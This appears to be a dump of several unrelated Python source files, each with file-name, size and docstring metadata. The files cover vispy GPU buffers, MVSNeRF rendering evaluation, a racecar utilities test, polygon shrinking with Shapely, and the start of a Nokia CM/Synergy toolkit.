# -> it is not already a structured array
# -> shape if 1-D or last dimension is 1,2,3 or 4
if isinstance(data, list):
data = np.array(data, dtype=np.float32)
if not isinstance(data, np.ndarray):
raise ValueError('Data must be a ndarray (got %s)' % type(data))
if data.dtype.isbuiltin:
if convert is True:
data = data.astype(np.float32)
if data.dtype in (np.float64, np.int64):
raise TypeError('data must be 32-bit not %s'
% data.dtype)
c = data.shape[-1] if data.ndim > 1 else 1
if c in [2, 3, 4]:
if not data.flags['C_CONTIGUOUS']:
logger.warning('Copying discontiguous data for struct '
'dtype:\n%s' % _last_stack_str())
data = data.copy()
else:
c = 1
if self._last_dim and c != self._last_dim:
raise ValueError('Last dimension should be %s not %s'
% (self._last_dim, c))
data = data.view(dtype=[('f0', data.dtype.base, c)])
self._last_dim = c
return data
def _last_stack_str():
"""Print stack trace from call that didn't originate from here"""
stack = extract_stack()
for s in stack[::-1]:
if op.join('vispy', 'gloo', 'buffer.py') not in __file__:
break
return format_list([s])[0]
# ------------------------------------------------------- IndexBuffer class ---
class IndexBuffer(DataBuffer):
""" Buffer for index data
Parameters
----------
data : ndarray | None
Buffer data.
"""
_GLIR_TYPE = 'IndexBuffer'
def __init__(self, data=None):
DataBuffer.__init__(self, data)
self._last_dim = 1
def _prepare_data(self, data, convert=False):
if isinstance(data, list):
data = np.array(data, dtype=np.uint32)
if not isinstance(data, np.ndarray):
raise ValueError('Data must be a ndarray (got %s)' % type(data))
if not data.dtype.isbuiltin:
raise TypeError("Element buffer dtype cannot be structured")
else:
if convert:
if data.dtype is not np.uint32:
data = data.astype(np.uint32)
else:
if data.dtype not in [np.uint32, np.uint16, np.uint8]:
raise TypeError("Invalid dtype for IndexBuffer: %r" %
data.dtype)
return data
| vispy/gloo/buffer.py | 16,293 | Generic GPU buffer.
A generic buffer is an interface used to upload data to a GPU array buffer
(ARRAY_BUFFER or ELEMENT_ARRAY_BUFFER). It keeps track of
buffer size but does not have any CPU storage. You can consider it as
write-only.
The `set_data` is a deferred operation: you can call it even if an OpenGL
context is not available. The `update` function is responsible to upload
pending data to GPU memory and requires an active GL context.
The Buffer class only deals with data in terms of bytes; it is not
aware of data type or element size.
Parameters
----------
data : ndarray | None
Buffer data.
nbytes : int | None
Buffer byte size.
GPU data buffer that is aware of data type and elements size
Parameters
----------
data : ndarray | None
Buffer data.
View on a sub-region of a DataBuffer.
Parameters
----------
base : DataBuffer
The buffer accessed by this view.
key : str, int, slice, or Ellpsis
The index into the base buffer that defines a sub-region of the buffer
to view. String arguments select a single field from multi-field
dtypes, and other allowed types select a subset of rows.
Notes
-----
It is generally not necessary to instantiate this class manually; use
``base_buffer[key]`` instead.
Buffer for index data
Parameters
----------
data : ndarray | None
Buffer data.
Buffer for vertex attribute data
Parameters
----------
data : ndarray
Buffer data (optional)
Create a view on this buffer.
Set data (deferred operation)
Print stack trace from call that didn't originate from here
Buffer base if this buffer is a view on another buffer.
Buffer dtype
GLSL declaration strings required for a variable to hold this data.
The total number of bytes required to store the array data
Buffer size in bytes
Buffer offset (in bytes) relative to base
Buffer offset (in bytes) relative to base
Resize this buffer (deferred operation).
Parameters
----------
size : int
New buffer size in bytes.
Resize the buffer (in-place, deferred operation)
Parameters
----------
size : integer
New buffer size in bytes
Notes
-----
This clears any pending operations.
Set data in the buffer (deferred operation).
This completely resets the size and contents of the buffer.
Parameters
----------
data : ndarray
Data to be uploaded
copy: bool
Since the operation is deferred, data may change before
data is actually uploaded to GPU memory.
Asking explicitly for a copy will prevent this behavior.
Set data (deferred operation)
Parameters
----------
data : ndarray
Data to be uploaded
copy: bool
Since the operation is deferred, data may change before
data is actually uploaded to GPU memory.
Asking explicitly for a copy will prevent this behavior.
**kwargs : dict
Additional arguments.
Set a sub-region of the buffer (deferred operation).
Parameters
----------
data : ndarray
Data to be uploaded
offset: int
Offset in buffer where to start copying data (in bytes)
copy: bool
Since the operation is deferred, data may change before
data is actually uploaded to GPU memory.
Asking explicitly for a copy will prevent this behavior.
Set a sub-region of the buffer (deferred operation).
Parameters
----------
data : ndarray
Data to be uploaded
offset: int
Offset in buffer where to start copying data (in bytes)
copy: bool
Since the operation is deferred, data may change before
data is actually uploaded to GPU memory.
Asking explicitly for a copy will prevent this behavior.
**kwargs : dict
Additional keyword arguments.
Number of elements in the buffer
Stride of data in memory
-*- coding: utf-8 -*- ----------------------------------------------------------------------------- Copyright (c) 2015, Vispy Development Team. All Rights Reserved. Distributed under the (new) BSD License. See LICENSE.txt for more info. ----------------------------------------------------------------------------- ------------------------------------------------------------ Buffer class --- Views on this buffer (stored using weakrefs) To invalidate buffer views Bytesize in bytes, set in resize_bytes() Set data If the whole buffer is to be written, we clear any pending data (because they will be overwritten anyway) Use SIZE to discard any previous data setting Only set data if there *is* data Invalidate any view on this buffer -------------------------------------------------------- DataBuffer class --- number of elements in buffer, set in resize_bytes() Can be overrriden by subclasses Setting a whole field of the buffer: only allowed if we have CPU storage. Note this case (key is string) only happen with base buffer Setting one or several elements Contiguous update? Make sure data is an array Make sure data is big enough Set data * self.itemsize Note that this class is a bit evil: it is a subclass of GLObject, Buffer and DataBuffer, but any of these __init__'s are not called ... Note how this never runs the super's __init__, all attributes must thus be set here ... ------------------------------------------------------ VertexBuffer class --- Build a structured view of the data if: -> it is not already a structured array -> shape if 1-D or last dimension is 1,2,3 or 4 ------------------------------------------------------- IndexBuffer class --- | 5,316 | en | 0.780625 |
import argparse
import re
####
# # Box 1
####
import sys,os,imageio,lpips
root = '/home/youngsun/documents/mvs/mvsnerf_timing'
os.chdir(root)
sys.path.append(root)
from opt_src import config_parser
from data import dataset_dict
from torch.utils.data import DataLoader
import matplotlib.pyplot as plt
# models
from models_src import *
from renderer_src import *
from data.ray_utils import get_rays
from tqdm import tqdm
from skimage.metrics import structural_similarity
# pytorch-lightning
from pytorch_lightning.callbacks import ModelCheckpoint
from pytorch_lightning import LightningModule, Trainer, loggers
from data.ray_utils import ray_marcher
import torch
torch.cuda.set_device(0)
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
####
# # Box 2
####
def decode_batch(batch):
rays = batch['rays'] # (B, 8)
rgbs = batch['rgbs'] # (B, 3)
return rays, rgbs
def unpreprocess(data, shape=(1,1,3,1,1)):
# to unnormalize image for visualization
# data N V C H W
device = data.device
mean = torch.tensor([-0.485 / 0.229, -0.456 / 0.224, -0.406 / 0.225]).view(*shape).to(device)
std = torch.tensor([1 / 0.229, 1 / 0.224, 1 / 0.225]).view(*shape).to(device)
return (data - mean) / std
def read_depth(filename):
depth_h = np.array(read_pfm(filename)[0], dtype=np.float32) # (800, 800)
depth_h = cv2.resize(depth_h, None, fx=0.5, fy=0.5,
interpolation=cv2.INTER_NEAREST) # (600, 800)
depth_h = depth_h[44:556, 80:720] # (512, 640)
# depth = cv2.resize(depth_h, None, fx=0.5, fy=0.5,interpolation=cv2.INTER_NEAREST)#!!!!!!!!!!!!!!!!!!!!!!!!!
mask = depth>0
return depth_h,mask
loss_fn_vgg = lpips.LPIPS(net='vgg')
mse2psnr = lambda x : -10. * np.log(x) / np.log(10.)
####
# # Box 3
####
# create function for returning dense, sparse, far views
def get_source_imgs(source_dataset, target_position, N_views, device, view_type='nearest',
fixed_idxs=None,
is_source_target_overlap=False):
pair_idx = get_pair_idx(source_dataset, target_position, N_views, view_type, fixed_idxs, is_source_target_overlap)
imgs_source, proj_mats, near_far_source, pose_source = source_dataset.read_source_views(pair_idx=pair_idx,device=device)
return imgs_source, proj_mats, near_far_source, pose_source
def get_pair_idx(source_dataset, target_position, N_views, view_type='nearest',
fixed_idxs=None,
is_source_target_overlap=False):
positions = source_dataset.poses[:,:3,3]
dis = np.sum(np.abs(positions - target_position), axis=-1)
dis_sort = np.argsort(dis)
if is_source_target_overlap:
dis_sort = dis_sort[1:]
if view_type == 'nearest': # or "as dense as possible ㅎㅎ"
pair_idx = dis_sort[:N_views]
pair_idx = [source_dataset.img_idx[item] for item in pair_idx]
if view_type == 'dense':
idxs = torch.randperm(int(np.rint(N_views*1.5)))[:N_views].sort()[0]
pair_idx = dis_sort[idxs]
pair_idx = [source_dataset.img_idx[item] for item in pair_idx]
if view_type == 'random': # i know its unnecessarily long...
idxs = torch.randperm(len(dis_sort))[:N_views]
pair_idx = dis_sort[idxs]
pair_idx = [source_dataset.img_idx[item] for item in pair_idx]
if view_type == 'sparse':
idxs = torch.linspace(0, len(dis_sort), steps=N_views+1).round()
idxs = [np.random.choice(range(int(idxs[i]), int(idxs[i+1]))) for i in range(len(idxs)-1)]
pair_idx = dis_sort[idxs]
pair_idx = [source_dataset.img_idx[item] for item in pair_idx]
if view_type == 'far':
idxs = torch.randperm(int(np.rint(N_views*1.5)))[:N_views].sort(descending=True)[0]
pair_idx = dis_sort[::-1][idxs]
pair_idx = [source_dataset.img_idx[item] for item in pair_idx]
if view_type == 'farthest':
pair_idx = dis_sort[::-1][:N_views]
pair_idx = [source_dataset.img_idx[item] for item in pair_idx]
# return index for the case of 'fixed'
if view_type == 'fixed':
pair_idx = fixed_idxs
return pair_idx
####
# # Box 4
####
def render_blender(view_type='nearest',
scenes=['ficus'],
num_src_views=3,
ckpt='base-3src-dense.tar',
source_split='train',
target_split='val',
select_index=None,
is_fixed=False,
is_source_target_overlap=False
):
psnr_all,ssim_all,LPIPS_vgg_all = [],[],[]
# for i_scene, scene in enumerate(['ship','mic','chair','lego','drums','ficus','materials','hotdog']):#
for i_scene, scene in enumerate(scenes):#
psnr,ssim,LPIPS_vgg = [],[],[]
cmd = f'--datadir /mnt/hdd/mvsnerf_data/nerf_synthetic/{scene} \
--dataset_name blender_src --white_bkgd \
--net_type v0 --ckpt ./ckpts/{ckpt} --num_src_views {num_src_views}'
save_dir = f'/mnt/hdd/youngsun/mvsnerf_timing/results/{ckpt[:-4]}/blender-{num_src_views}-'
if is_fixed:
save_dir += 'fixed-'
save_dir += f'{view_type}-'
save_dir += f'{source_split}-{target_split}/{scene}'
args = config_parser(cmd.split())
args.use_viewdirs = True
args.N_samples = 128
# args.feat_dim = 8+12
args.feat_dim = 8+4*num_src_views
# create models
if 0==i_scene:
render_kwargs_train, render_kwargs_test, start, grad_vars = create_nerf_mvs(args, use_mvs=True, dir_embedder=False, pts_embedder=True)
filter_keys(render_kwargs_train)
MVSNet = render_kwargs_train['network_mvs']
render_kwargs_train.pop('network_mvs')
datadir = args.datadir
datatype = 'train'
pad = 16
args.chunk = 5120
print('============> rendering dataset <===================')
dataset_source = dataset_dict[args.dataset_name](args, split=source_split)
dataset_target = dataset_dict[args.dataset_name](args, split=target_split, select_index=select_index)
target_idx = dataset_target.img_idx
save_as_image = True
os.makedirs(save_dir, exist_ok=True)
MVSNet.train()
MVSNet = MVSNet.cuda()
with torch.no_grad():
try:
tqdm._instances.clear()
except Exception:
pass
for i, batch in enumerate(tqdm(dataset_target)):
torch.cuda.empty_cache()
rays, img = decode_batch(batch)
rays = rays.squeeze().to(device) # (H*W, 3)
img = img.squeeze().cpu().numpy() # (H, W, 3)
if is_fixed:
if i == 0:
if select_index is not None:
pair_idx = get_pair_idx(source_dataset=dataset_source,
target_position=dataset_target.poses[[len(select_index)//2],:3,3],
N_views=args.num_src_views,
view_type=view_type)
else:
pair_idx = get_pair_idx(source_dataset=dataset_source,
target_position=dataset_target.poses[[50],:3,3],
N_views=args.num_src_views,
view_type=view_type)
imgs_source, proj_mats, near_far_source, pose_source = dataset_source.read_source_views(pair_idx=pair_idx,
device=device)
else:
# created fixed image_source
imgs_source, proj_mats, near_far_source, pose_source = get_source_imgs(source_dataset=dataset_source,
target_position=dataset_target.poses[[i],:3,3],
N_views=args.num_src_views, device=device,
view_type=view_type)
volume_feature, _, _ = MVSNet(imgs_source, proj_mats, near_far_source, pad=pad)
imgs_source = unpreprocess(imgs_source)
N_rays_all = rays.shape[0]
rgb_rays, depth_rays_preds = [],[]
for chunk_idx in range(N_rays_all//args.chunk + int(N_rays_all%args.chunk>0)):
xyz_coarse_sampled, rays_o, rays_d, z_vals = ray_marcher(rays[chunk_idx*args.chunk:(chunk_idx+1)*args.chunk],
N_samples=args.N_samples)
# Converting world coordinate to ndc coordinate
H, W = img.shape[:2]
inv_scale = torch.tensor([W - 1, H - 1]).to(device)
w2c_ref, intrinsic_ref = pose_source['w2cs'][0], pose_source['intrinsics'][0].clone()
intrinsic_ref[:2] *= args.imgScale_test/args.imgScale_train
xyz_NDC = get_ndc_coordinate(w2c_ref, intrinsic_ref, xyz_coarse_sampled, inv_scale,
near=near_far_source[0], far=near_far_source[1], pad=pad*args.imgScale_test)
# rendering
rgb, disp, acc, depth_pred, alpha, extras = rendering(args, pose_source, xyz_coarse_sampled,
xyz_NDC, z_vals, rays_o, rays_d,
volume_feature,imgs_source, **render_kwargs_train)
rgb, depth_pred = torch.clamp(rgb.cpu(),0,1.0).numpy(), depth_pred.cpu().numpy()
rgb_rays.append(rgb)
depth_rays_preds.append(depth_pred)
depth_rays_preds = np.concatenate(depth_rays_preds).reshape(H, W)
depth_rays_preds, _ = visualize_depth_numpy(depth_rays_preds, near_far_source)
rgb_rays = np.concatenate(rgb_rays).reshape(H, W, 3)
img_vis = np.concatenate((img*255,rgb_rays*255,depth_rays_preds),axis=1)
img_vis = np.concatenate((torch.cat(torch.split(imgs_source*255, [1]*num_src_views, dim=1),-1).squeeze().permute(1,2,0).cpu().numpy(),img_vis),axis=1)
if save_as_image:
imageio.imwrite(f'{save_dir}/{scene}_{target_idx[i]:03d}.png', img_vis.astype('uint8'))
else:
rgbs.append(img_vis.astype('uint8'))
# quantity
# center crop 0.8 ratio
H_crop, W_crop = np.array(rgb_rays.shape[:2])//10
img = img[H_crop:-H_crop,W_crop:-W_crop]
rgb_rays = rgb_rays[H_crop:-H_crop,W_crop:-W_crop]
psnr.append( mse2psnr(np.mean((rgb_rays-img)**2)))
ssim.append( structural_similarity(rgb_rays, img, multichannel=True))
img_tensor = torch.from_numpy(rgb_rays)[None].permute(0,3,1,2).float()*2-1.0 # image should be RGB, IMPORTANT: normalized to [-1,1]
img_gt_tensor = torch.from_numpy(img)[None].permute(0,3,1,2).float()*2-1.0
LPIPS_vgg.append( loss_fn_vgg(img_tensor, img_gt_tensor).item())
print(f'=====> scene: {scene} mean psnr {np.mean(psnr)} ssim: {np.mean(ssim)} lpips: {np.mean(LPIPS_vgg)}')
psnr_all.append(psnr);ssim_all.append(ssim);LPIPS_vgg_all.append(LPIPS_vgg)
if not save_as_image:
imageio.mimwrite(f'{save_dir}/{scene}_spiral.mp4', np.stack(rgbs), fps=20, quality=10)
print(f'=====> all mean psnr {np.mean(psnr_all)} ssim: {np.mean(ssim_all)} lpips: {np.mean(LPIPS_vgg_all)}')
####
# # Box 5
####
def render_blender_all_settings(scenes=['lego'], num_src_views=3, ckpt='base-3src-dense.tar',source_split='train', target_split='val', select_index=[30,60,90], view_types=[1]):
if 1 in view_types:
render_blender('nearest', scenes, num_src_views, ckpt, source_split, target_split, select_index, is_fixed=None)
if 2 in view_types:
render_blender('dense', scenes, num_src_views, ckpt, source_split, target_split, select_index, is_fixed=None)
if 3 in view_types:
render_blender('sparse', scenes, num_src_views, ckpt, source_split, target_split, select_index, is_fixed=None)
if 4 in view_types:
render_blender('far', scenes, num_src_views, ckpt, source_split, target_split, select_index, is_fixed=None)
if 5 in view_types:
render_blender('random', scenes, num_src_views, ckpt, source_split, target_split, select_index, is_fixed=None)
if 6 in view_types:
render_blender('nearest', scenes, num_src_views, ckpt, source_split, target_split, select_index, is_fixed=True)
if 7 in view_types:
render_blender('sparse', scenes, num_src_views, ckpt, source_split, target_split, select_index, is_fixed=True)
if 8 in view_types:
render_blender('nearest', scenes, num_src_views, ckpt, source_split, target_split, select_index, is_fixed=None, is_source_target_overlap=True)
if 9 in view_types:
render_blender('sparse', scenes, num_src_views, ckpt, source_split, target_split, select_index, is_fixed=None, is_source_target_overlap=True)
return None
####
# # Box 6
####
####
# # Box 7
####
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--view_types', nargs="+", type=int,
help= 'Enter list of view types to render:' \
' 1 - nearest, 2 - dense, 3 - sparse, 4 - far, 5 - random, ' \
'6 - fixed nearset, 7 - fixed sparse, 8 - unseen nearest, 9 - unseen sparse')
parser.add_argument('--view_indexes', nargs="+", type=int, const=None, default=None,
help= 'default - all views (100)')
parser.add_argument('--scenes', nargs='+', default=[])
parser.add_argument('--ckpts', nargs='+', default=[])
parser.add_argument('--source', type=str, default='train')
parser.add_argument('--target', type=str, default='val')
args = parser.parse_args()
for ckpt in args.ckpts:
num_src_views = int(re.findall('[0-9]+', ckpt)[0])
render_blender_all_settings(scenes=args.scenes,
num_src_views=num_src_views,
ckpt=ckpt,
source_split=args.source,
target_split=args.target,
select_index=args.view_indexes,
view_types=args.view_types)
torch.cuda.empty_cache() | renderer_blender_src.py | 15,373 | Box 1 models pytorch-lightning Box 2 (B, 8) (B, 3) to unnormalize image for visualization data N V C H W (800, 800) (600, 800) (512, 640) depth = cv2.resize(depth_h, None, fx=0.5, fy=0.5,interpolation=cv2.INTER_NEAREST)!!!!!!!!!!!!!!!!!!!!!!!!! Box 3 create function for returning dense, sparse, far views or "as dense as possible ㅎㅎ" i know its unnecessarily long... return index for the case of 'fixed' Box 4 for i_scene, scene in enumerate(['ship','mic','chair','lego','drums','ficus','materials','hotdog']): args.feat_dim = 8+12 create models (H*W, 3) (H, W, 3) created fixed image_source Converting world coordinate to ndc coordinate rendering quantity center crop 0.8 ratio image should be RGB, IMPORTANT: normalized to [-1,1] Box 5 Box 6 Box 7 | 768 | en | 0.542812 |
"""
Copyright MIT and Harvey Mudd College
MIT License
Summer 2020
A simple program which can be used to manually test racecar_utils functionality.
"""
########################################################################################
# Imports
########################################################################################
import math
import sys
sys.path.insert(1, "../library")
import racecar_core
import racecar_utils as rc_utils
########################################################################################
# Global variables
########################################################################################
rc = racecar_core.create_racecar()
RED = ((170, 50, 50), (10, 255, 255))
max_speed = 0
show_triggers = False
show_joysticks = False
########################################################################################
# Functions
########################################################################################
def start():
"""
This function is run once every time the start button is pressed
"""
global max_speed
global show_triggers
global show_joysticks
print("Start function called")
rc.set_update_slow_time(0.5)
rc.drive.stop()
max_speed = 0.25
show_triggers = False
show_joysticks = False
# Test numeric functions
assert rc_utils.remap_range(5, 0, 10, 0, 50) == 25
assert rc_utils.remap_range(5, 0, 20, 1000, 900) == 975
assert rc_utils.remap_range(2, 0, 1, -10, 10) == 30
assert rc_utils.remap_range(2, 0, 1, -10, 10, True) == 10
assert rc_utils.clamp(3, 0, 10) == 3
assert rc_utils.clamp(-2, 0, 10) == 0
assert rc_utils.clamp(11, 0, 10) == 10
# Print start message
print(
">> Test Utils: A testing program for the racecar_utils library.\n"
"\n"
"Controls:\n"
" Right trigger = accelerate forward\n"
" Left trigger = accelerate backward\n"
" Left joystick = turn front wheels\n"
" A button = Take a color image and crop it to the top left\n"
" B button = Take a color image and identify the largest red contour\n"
" X button = Take a depth image and print several statistics\n"
" Y button = Take a lidar scan and print several statistics\n"
)
def update():
"""
After start() is run, this function is run every frame until the back button
is pressed
"""
# Display the color image cropped to the top left
if rc.controller.was_pressed(rc.controller.Button.A):
image = rc.camera.get_color_image()
cropped = rc_utils.crop(
image, (0, 0), (rc.camera.get_height() // 2, rc.camera.get_width() // 2)
)
rc.display.show_color_image(cropped)
# Find and display the largest red contour in the color image
if rc.controller.was_pressed(rc.controller.Button.B):
image = rc.camera.get_color_image()
contours = rc_utils.find_contours(image, RED[0], RED[1])
largest_contour = rc_utils.get_largest_contour(contours)
if largest_contour is not None:
center = rc_utils.get_contour_center(largest_contour)
area = rc_utils.get_contour_area(largest_contour)
print("Largest red contour: center={}, area={:.2f}".format(center, area))
rc_utils.draw_contour(image, largest_contour, rc_utils.ColorBGR.green.value)
rc_utils.draw_circle(image, center, rc_utils.ColorBGR.yellow.value)
rc.display.show_color_image(image)
else:
print("No red contours found")
# Print depth image statistics and show the cropped upper half
if rc.controller.was_pressed(rc.controller.Button.X):
depth_image = rc.camera.get_depth_image()
# Measure average distance at several points
left_distance = rc_utils.get_pixel_average_distance(
depth_image, (rc.camera.get_height() // 2, rc.camera.get_width() // 4),
)
center_distance = rc_utils.get_depth_image_center_distance(depth_image)
center_distance_raw = rc_utils.get_depth_image_center_distance(depth_image, 1)
right_distance = rc_utils.get_pixel_average_distance(
depth_image, (rc.camera.get_height() // 2, 3 * rc.camera.get_width() // 4),
)
print(f"Depth image left distance: {left_distance:.2f} cm")
print(f"Depth image center distance: {center_distance:.2f} cm")
print(f"Depth image raw center distance: {center_distance_raw:.2f} cm")
print(f"Depth image right distance: {right_distance:.2f} cm")
# Measure pixels where the kernel falls off the edge of the photo
upper_left_distance = rc_utils.get_pixel_average_distance(
depth_image, (2, 1), 11
)
lower_right_distance = rc_utils.get_pixel_average_distance(
depth_image, (rc.camera.get_height() - 2, rc.camera.get_width() - 5), 13
)
print(f"Depth image upper left distance: {upper_left_distance:.2f} cm")
print(f"Depth image lower right distance: {lower_right_distance:.2f} cm")
# Find closest point in bottom third
cropped = rc_utils.crop(
depth_image,
(0, 0),
(rc.camera.get_height() * 2 // 3, rc.camera.get_width()),
)
closest_point = rc_utils.get_closest_pixel(cropped)
closest_distance = cropped[closest_point[0]][closest_point[1]]
print(
f"Depth image closest point (upper half): (row={closest_point[0]}, col={closest_point[1]}), distance={closest_distance:.2f} cm"
)
rc.display.show_depth_image(cropped, points=[closest_point])
# Print lidar statistics and show visualization with closest point highlighted
if rc.controller.was_pressed(rc.controller.Button.Y):
lidar = rc.lidar.get_samples()
front_distance = rc_utils.get_lidar_average_distance(lidar, 0)
right_distance = rc_utils.get_lidar_average_distance(lidar, 90)
back_distance = rc_utils.get_lidar_average_distance(lidar, 180)
left_distance = rc_utils.get_lidar_average_distance(lidar, 270)
print(f"Front LIDAR distance: {front_distance:.2f} cm")
print(f"Right LIDAR distance: {right_distance:.2f} cm")
print(f"Back LIDAR distance: {back_distance:.2f} cm")
print(f"Left LIDAR distance: {left_distance:.2f} cm")
closest_sample = rc_utils.get_lidar_closest_point(lidar)
print(
f"Closest LIDAR point: {closest_sample[0]:.2f} degrees, {closest_sample[1]:.2f} cm"
)
rc.display.show_lidar(lidar, highlighted_samples=[closest_sample])
# Print lidar distance in the direction the right joystick is pointed
rjoy_x, rjoy_y = rc.controller.get_joystick(rc.controller.Joystick.RIGHT)
if abs(rjoy_x) > 0 or abs(rjoy_y) > 0:
lidar = rc.lidar.get_samples()
angle = (math.atan2(rjoy_x, rjoy_y) * 180 / math.pi) % 360
distance = rc_utils.get_lidar_average_distance(lidar, angle)
print(f"LIDAR distance at angle {angle:.2f} = {distance:.2f} cm")
# Default drive-style controls
left_trigger = rc.controller.get_trigger(rc.controller.Trigger.LEFT)
right_trigger = rc.controller.get_trigger(rc.controller.Trigger.RIGHT)
left_joystick = rc.controller.get_joystick(rc.controller.Joystick.LEFT)
rc.drive.set_speed_angle(right_trigger - left_trigger, left_joystick[0])
########################################################################################
# DO NOT MODIFY: Register start and update and begin execution
########################################################################################
if __name__ == "__main__":
rc.set_start_update(start, update, None)
rc.go()
| labs/test_utils.py | 7,768 | This function is run once every time the start button is pressed
After start() is run, this function is run every frame until the back button
is pressed
Copyright MIT and Harvey Mudd College
MIT License
Summer 2020
A simple program which can be used to manually test racecar_utils functionality.
Imports Global variables Functions Test numeric functions Print start message Display the color image cropped to the top left Find and display the largest red contour in the color image Print depth image statistics and show the cropped upper half Measure average distance at several points Measure pixels where the kernel falls off the edge of the photo Find closest point in bottom third Print lidar statistics and show visualization with closest point highlighted Print lidar distance in the direction the right joystick is pointed Default drive-style controls DO NOT MODIFY: Register start and update and begin execution | 922 | en | 0.786002 |
import numpy as np
from shapely import geometry
def shrink(coords: np.ndarray, dist: np.ndarray) -> tuple[np.ndarray]:
"""Shrinks a 2D polygon by a given distance.
The coordinates of the polygon are expected as an N x 2-matrix,
and a positive distance results in inward shrinking.
An empty set is returned if the shrinking operation removes all
original elements.
Args:
coords: A matrix of coordinates.
dist: The distance to shrink by.
Returns:
A tuple containing the x, y coordinates of the original set, as
well as the x and y coordinates of the shrunken set, in that
order.
"""
my_polygon = geometry.Polygon(coords)
xy = my_polygon.exterior.xy
my_polygon_shrunken = my_polygon.buffer(-dist)
try:
xys = my_polygon_shrunken.exterior.xy
except AttributeError:
xys = ([0], [0]) # Empty set
return (*xy, *xys)
def hausdorff(A: np.ndarray, B: np.ndarray) -> float:
"""Computes the Hausdorff distance between two 2D polygons.
Args:
A: A matrix defining the first polygon.
B: A matrix defining the second polygon.
Returns:
A float representing the Hausdorff distance.
"""
return geometry.Polygon(A).hausdorff_distance(geometry.Polygon(B))
def read_polygon(file: str) -> np.ndarray:
"""Reads a polygon from a table.
Args:
file: Path to a file containing a plain text, tab-separated
table with scalars.
Returns:
A matrix containing the data in the file.
"""
return np.genfromtxt(file)
if __name__ == "__main__":
import matplotlib as mpl
import matplotlib.pyplot as plt
# Distance to shrink by
dh = 0.01
x, y, xs, ys = shrink(read_polygon('example.txt'), dh)
ax = plt.subplot()
ax.grid(which='major', alpha=0.5, color='k')
ax.grid(which='minor', alpha=0.3, color='k', linestyle=':')
ax.minorticks_on()
ax.set_axisbelow(True)
ax.fill(x, y, color='b', facecolor='lightskyblue',
edgecolor='dodgerblue', label='Original', alpha=0.75)
ax.fill(xs, ys, facecolor='mediumseagreen', edgecolor='forestgreen',
label='Shrunk', alpha=0.75)
ax.set_aspect('equal')
ax.legend()
golden = 0.01017601435813135
assert(np.isclose(
hausdorff(np.vstack([x, y]).T, np.vstack([xs, ys]).T),
golden
))
print("SUCCESS")
print(f'Area original: {geometry.Polygon(np.vstack([x, y]).T).area:.6f}')
print(f'Area shrunk: {geometry.Polygon(np.vstack([xs, ys]).T).area:.6f}')
plt.show() | geometry_tools.py | 2,608 | Computes the Hausdorff distance between two 2D polygons.
Args:
A: A matrix defining the first polygon.
B: A matrix defining the second polygon.
Returns:
A float representing the Hausdorff distance.
Reads a polygon from a table.
Args:
file: Path to a file containing a plain text, tab-separated
table with scalars.
Returns:
A matrix containing the data in the file.
Shrinks a 2D polygon by a given distance.
The coordinates of the polygon are expected as an N x 2-matrix,
and a positive distance results in inward shrinking.
An empty set is returned if the shrinking operation removes all
original elements.
Args:
coords: A matrix of coordinates.
dist: The distance to shrink by.
Returns:
A tuple containing the x, y coordinates of the original set, as
well as the x and y coordinates of the shrunken set, in that
order.
Empty set Distance to shrink by | 909 | en | 0.855529 |
''' Taking characters from terminal without pressing enter for movements '''
from __future__ import print_function
class AlarmException(Exception):
pass | alarmexception.py | 157 | Taking characters from terminal without pressing enter for movements | 68 | en | 0.902642 |
#============================================================================
#Name : __init__.py
#Part of : Helium
#Copyright (c) 2009 Nokia Corporation and/or its subsidiary(-ies).
#All rights reserved.
#This component and the accompanying materials are made available
#under the terms of the License "Eclipse Public License v1.0"
#which accompanies this distribution, and is available
#at the URL "http://www.eclipse.org/legal/epl-v10.html".
#
#Initial Contributors:
#Nokia Corporation - initial contribution.
#
#Contributors:
#
#Description:
#===============================================================================
""" CM/Synergy Python toolkit.
"""
import logging
import netrc
import os
import re
import subprocess
import sys
import threading
import fileutils
import nokia.gscm
import tempfile
import socket
# Uncomment this line to enable logging in this module, or configure logging elsewhere
_logger = logging.getLogger("ccm")
#logging.basicConfig(level=logging.DEBUG)
VALID_OBJECT_STATES = ('working', 'checkpoint', 'public', 'prep', 'integrate', 'sqa', 'test','released')
STATIC_OBJECT_STATES = ('integrate', 'sqa', 'test','released')
CCM_SESSION_LOCK = os.path.join(tempfile.gettempdir(), "ccm_session.lock")
def _execute(command, timeout=None):
""" Runs a command and returns the result data. """
targ = ""
if timeout is not None:
targ = "--timeout=%s" % timeout
process = subprocess.Popen("python -m timeout_launcher %s -- %s" % (targ, command), stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
stdout = process.communicate()[0]
process.wait()
_logger.debug(stdout)
_logger.debug("Return code: %s" % process.returncode)
return (stdout, process.returncode)
class CCMException(Exception):
""" Base exception that should be raised by methods of this framework. """
def __init__(self, reason, result = None):
Exception.__init__(self, reason)
self.result = result
class Result(object):
"""Class that abstracts ccm call result handling.
Subclass it to implement a new generic output parser.
"""
def __init__(self, session):
self._session = session
self.status = None
self._output = None
self._output_str = None
def _setoutput(self, output):
self._output = output
def __setoutput(self, output):
""" Internal function to allow overloading, you must override _setoutput.
"""
# the output is automatically converted to ascii before any treatment
if isinstance(output, unicode):
self._output_str = output.encode('ascii', 'replace')
else:
self._output_str = output.decode('ascii', 'ignore')
_logger.debug("output ---->")
for line in self._output_str.splitlines():
_logger.debug(line)
_logger.debug("<----")
self._setoutput(self._output_str)
def _getoutput(self):
""" Returns the content of _output. """
return self._output
def __str__(self):
""" Synergy output log. """
return self._output_str.encode('ascii', 'replace')
output = property(_getoutput, __setoutput)
class ResultWithError(Result):
def __init__(self, session):
Result.__init__(self, session)
self._error = None
self._error_str = None
def _seterror(self, error):
self._error = error
def __seterror(self, error):
""" Internal function to allow overloading, you must override _seterror.
"""
# the error output is automatically converted to ascii before any treatment
if isinstance(error, unicode):
self._error_str = error.encode('ascii', 'replace')
else:
self._error_str = error.decode('ascii', 'ignore')
_logger.debug("error ---->")
for line in self._error_str.splitlines():
_logger.debug(line)
_logger.debug("<----")
self._seterror(self._error_str)
def _geterror(self):
""" Returns the content of _output. """
_logger.debug("_geterror")
return self._error
error = property(_geterror, __seterror)
class ProjectCheckoutResult(Result):
""" Project checkout output parser.
Sets project to the created project or None if failed.
"""
def __init__(self, session, project):
Result.__init__(self, session)
self.__project = project
self.__result_project = None
def _setoutput(self, output):
""" Parsing the output of the checkout command. """
self._output = output
for line in output.splitlines():
